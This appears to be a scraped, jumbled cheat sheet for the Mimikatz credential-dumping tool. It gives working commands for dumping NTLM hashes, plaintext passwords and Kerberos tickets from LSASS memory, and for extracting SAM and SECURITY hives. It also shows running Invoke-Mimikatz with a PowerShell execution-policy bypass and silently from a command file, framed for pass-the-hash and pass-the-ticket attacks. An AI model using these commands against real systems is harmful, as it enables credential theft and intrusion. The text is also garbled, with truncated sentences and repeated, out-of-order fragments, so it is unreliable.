Mimikatz Cheatsheet |best| -

| Command | Purpose | | :--- | :--- | | lsadump::sam | Dumps local SAM hashes (NTLM) from the registry. | | lsadump::sam /sam:FILE /system:FILE | Dump SAM from saved hive files (offline). | | lsadump::secrets | Dumps secrets from the SECURITY registry (e.g., cached domain logons). | Simulate a domain controller to request password hashes for any user.

mimikatz.exe "privilege::debug" "token::elevate" "exit" 1. Grab Passwords from LSASS Memory (sekurlsa) This is the classic "pass-the-hash" or "pass-the-password" attack. mimikatz cheatsheet

| Command | Purpose | | :--- | :--- | | mimikatz.exe | Launch the tool (interactive mode). | | mimikatz # privilege::debug | Seeks . This is the "master key" to interact with LSASS. | | mimikatz # token::elevate | Elevates to SYSTEM account (often needed for LSASS access). | | mimikatz # exit | Exit the Mimikatz console. | | Command | Purpose | | :--- |

# Using Invoke-Mimikatz (from PowerSploit) powershell -exec bypass Import-Module .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' Save commands to a .txt file and execute silently. | Simulate a domain controller to request password

| Command | Result | | :--- | :--- | | sekurlsa::logonpasswords | Dumps all active logon sessions (NTLM hashes + plaintext if WDigest is enabled). | | sekurlsa::tickets | Dumps all Kerberos tickets for pass-the-ticket attacks. | | sekurlsa::ekeys | Dumps Kerberos encryption keys (useful for Overpass-the-Hash). | 2. Extract SAM & SYSTEM Hives If LSASS is protected, go directly to the registry.

echo privilege::debug >> commands.txt echo sekurlsa::logonpasswords >> commands.txt echo exit >> commands.txt mimikatz.exe ""script:commands.txt"" If you are defending a network, you must assume Mimikatz will be used.